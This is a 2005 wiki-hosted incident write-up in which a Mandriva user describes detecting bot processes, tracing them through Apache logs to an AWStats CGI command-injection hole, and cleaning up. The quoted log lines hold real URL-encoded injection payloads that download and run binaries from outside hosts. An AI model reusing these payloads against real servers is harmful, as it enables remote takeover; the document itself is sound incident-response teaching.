Docs/Support/Emergencies/Example
From Mandriva Community Wiki
The following play-by-play recap of a troubleshooting session was posted to the Mandriva Expert List as part of a lengthy discussion on tips for using the CLI, and on whether or not users who generally shun the command line could benefit from some sort of a "cheat sheet" to help them bypass the CLI learning curve when dealing with those occasional emergencies where their customary GUI tools are either not available or not useful, and on whether or not creating such a thing in any useful form was in fact even possible to do. To place it in context of the thread, James Sparenberg had just emphasized the importance of examining log files when troubleshooting, and this was offered in support of that excellent point.
Bravo, James - this is so true. Logs are invaluable.
Case in point is a problem that I just ferreted out on this 10.0OE box. I happened to run ps to have a look for a process that I suspected had not properly completed when I had closed the app's window, when lo and behold, I discovered a couple of running processes whose command lines were "./h" and "./mech". These didn't belong, and the hunt was on. ;)
The first step was to find the executables. I ran "ps aux" and took note of the user and PID of each process; they were running as the apache user, which was my first hint as to the method by which they might have arrived. I then ran "/usr/sbin/lsof -p [number]" with each PID number in turn, which told me that both of them were sitting in my /tmp directory.
Next, I ran "kill -9 [number]" on each PID to end them, and moved the executables out of /tmp and into a quarantine dir that I've set up for just this sort of thing (it has root ownership, with 700 permissions). The "mech" one had also created a subdir, "/tmp/bot", which I also moved into the quarantine dir. I could've just deleted them outright, but this permits me to examine them at my leisure, should I be so inclined.
And I am so inclined. Ohhh, yeah. Precipitously so, ya might say. :)
I then brought down Apache ( /sbin/service httpd stop ) for the duration of the investigation. While I could be fairly confident that this had been these exploits' vector of entry, due to the fact that the critters were running as user apache and apache owned their files in /tmp, I still hadn't nailed down the precise method by which the vermin got in. Was it a hole in Apache itself? In PHP? A poor config? Something else?
Here's where the logs came in very handy. I ran this command:
grep -v ^192.168 /var/log/httpd/access_log | less
For those unfamiliar with grep, this means, "Look through the access_log file for every line that does *not* (-v) begin with '192.168' (^192.168) and pipe these lines into less, so that I can read and search them." This removed the vast bulk of the irrelevant log entries - the LAN here uses 192.168.x.x addresses, and these IPs account for the overwhelming majority of the Apache accesses on this particular system.
Skipping to the end of the file (the most recent entries) and working my way backwards, it took very little time to spot the following odd lines:
64.72.88.10 - - [18/Mar/2005:11:43:23 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3b%20cd%20%2ftmp%20%3bwget%20%aundernet% 2eat%2fh%20%3bchmod%20%2bx%20h%20%3b%2e%2fh%3becho%20e_exp%3b%2500 HTTP/1.1" 404 458 "-" "-" 64.72.88.10 - - [18/Mar/2005:11:43:33 -0500] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3b%20wget%20www%2ebaw%2dbaw%2ehome%2ero% 2fbot1%2etar%2egz%3btar%20zxvf%20bot1%2etar%2egz%3b%20rm%20%2drf%20bot1%2etar%2egz%3b%20cd%20bot%3b%20%2e%2fmech% 3b%20%2e%2fmech%3b%20%2e%2fmech%3becho%20e_exp%3b%2500 HTTP/1.1" 200 1679 "-" "-" 64.72.88.10 - - [20/Mar/2005:11:32:52 -0500] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3b%20cd%20%2ftmp%20%3bwget%20undernet%2eat%2fh% 20%a%3bchmod%20%2bx%20h%20%3b%2e%2fh%3becho%20e_exp%3b%2500 HTTP/1.1" 200 698 "-" "-" 64.72.88.10 - - [20/Mar/2005:11:32:54 -0500] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3b%20cd%20%2ftmp%20%3bwget%20undernet%2eat%2fh% 20%a%3bchmod%20%2bx%20h%20%3b%2e%2fh%3becho%20e_exp%3b%2500 HTTP/1.1" 404 471 "-" "-" 64.72.88.10 - - [20/Mar/2005:11:33:12 -0500] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3b%20cd%20bot%3b%20%2e%2fmech%3b%20%2e% 2fmech%3b%20%2e%2fmech%3becho%20e_exp%3b%2500 HTTP/1.1" 200 537 "-" "-"
"AWStats?", I said to myself, "I don't even remember installing it!". But of course I had done so; I had played around with it a bit at the time, and had then proceeded to forget all about it. Off I went to the project's homepage, http://awstats.sourceforge.net, where I found this:
Warning, a security hole was recently found in AWStats versions from 5.0 to 6.3 (Partially fixed in 6.3) when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody"). If you use AWStats with a more recent version or if AWStats is not available as a CGI, you are safe. If not, it is highly recommanded to upgrade to 6.4 version that fix all known security holes.
A quick rpm -qa awstats revealed that the version that I had (from 10.0OE contrib) was awstats-6.0-1mdk ... and there was that question answered. I immediately removed it ( urpme awstats ), and then brought Apache back up again ( /sbin/service httpd start ). Done.
Well, almost done, at any rate. A couple of quick host and whois commands brought me the owner of that IP address and their contact info, and an abuse complaint was filed. Next up was a brief write-up of the situation for Vincent and the secteam (for their information only, as contrib packages are unsupported), and then this somewhat more detailed essay on the troubleshooting process for any interested parties here.
Total time, from first run of ps to bringing Apache back up - about 25 minutes, give or take. Writing it up has taken considerably longer than that, and the forensics are in progress. As you can see, every aspect of the fix was done from the CLI; while I was at that time logged in to an X session locally, I could just as well have done the whole thing over ssh from another system, in exactly the same manner. Note that it took the use of just twelve commands other than ls and man (thirteen, if you count that I used sudo for all of the you-need-to-be-root ones):
ps lsof kill mv service grep less links (to read the web page) rpm urpme host whois
Am I thoroughly familiar with the hundreds of CLI commands available on my system? No; I probably only use a repertoire of 40 to 50 of them on anything approaching a regular basis. Did I have to hit any man pages during this adventure? Yes; the ones for lsof and grep. What were the factors that contributed most to a speedy resolution of the problem?
- It was not the first time that I had used any of these commands, nor am I a complete foreigner to the CLI itself. This is absolutely vital, and cannot be stressed enough - if you studiously avoid the CLI at every opportunity until an emergency arises, you are not going to be able to make effective use of it when that crisis occurs, regardless of how many cheatsheets/HOWTOs you consult at that point. OTOH, if you experiment with it from time to time now, while the pressure is off and the stakes are low, it will not be nearly so daunting a prospect when the time comes that the CLI is the only choice open to you. And that means opening up a terminal every so often, and then putting the mouse out of your easy reach for a little while. It won't kill ya, trust me. :)
- It was also not the first time I had read a man page, and I've now referred to enough different ones (and to the same ones often enough each) that I am familiar with their basic structure, and only with that familiarity came the ability to quickly skim through the more verbose ones (grep, rpm) to find the one or two options that I actually need. I see no other way to achieve this but practice, practice, practice. When I see a potentially useful command mentioned here, for example, I pull up its man page and have myself a bit of a read, to learn what it can do. I am aware that most commands have more options that I will never need than they do those that I will, so as I'm learning the capabilities of the command, I'm keeping an eye out for ones with relevance to my needs; I'm not concerning myself with remembering the syntax of even this limited subset of options, at this stage - the man page isn't going anywhere, after all - and all I'm looking to retain at this point are things like, "lsof is the command to list the open files of a process". I don't just read about them, of course; I "take them out for a test drive" as I'm reading, and thereby make sure that I understand how to work with them at least a little bit.
- On the sage advice of others, I have also put in a little time here and there learning a few of "the basics" about the structure of *nix systems in general, and of Mandrake ones in particular: things like the File Hierarchy Standard (what goes where, and why), the purpose and effects of permissions and ownerships (who can run/access what, and why), which daemons log data into which logfiles, some of the simpler shell stuff like redirection and pipes, etc. Once one has gained at least some grasp, however tenuous it may be, of the most fundamental concepts that apply through and through every Linux system, life as a sysadmin becomes a lot easier in every respect (and don't kid yourself, if you're the one who knows the root password on that system right in front of you, you're a sysadmin <g>). One analogy would be to driving around occasionally in a European nation where you cannot read the local language - would you find that the time that you had spent familiarizing yourself with the standard system of signage shapes and colors that has been adopted throughout Europe had been worth your while? I suspect that you would, and furthermore that that entire area would seem to you to be far more navigable overall than if you hadn't done so, no matter whether or not you also happened to have a decent map near at hand.
- I make it a point to run ps aux every so often, and have now done so with sufficient frequency to gradually form a clear picture of which processes ought to be running at any given moment, and to which services or apps each one belongs (when you stop Apache, which ones go away? when you start Evolution, which ones appear?); without that knowledge of what output I should expect from ps when all is right with the world, I would never have noticed that anything was unusual about the system at all.
- The box itself lives behind a decent firewall (a repurposed low-spec Duron system that last ran Win98, would choke noisily on XP, and is now headless running SmoothWall Express), and there are only two ports being forwarded to it from the WAN, ssh (22) and http (80). This has two clear advantages: the first one is that those two ways in are pretty much it, short of having to first compromise another of the internal systems, so diagnosis is simplified proportionally, and the second is that any ports on which such rogue apps as these two may be listening for connections will never see a byte of inbound traffic from the outside world.
Well, I've been going on quite long enough, and if you've read this far, I do hope that you found something useful buried within this windy tale. At the very least, if you have AWStats installed on a system that allows access to Apache from the world at large, it might be a good idea to take a brief glance at the version number that you're using ... ;)
-- Main.BillMullen - 22 Mar 2005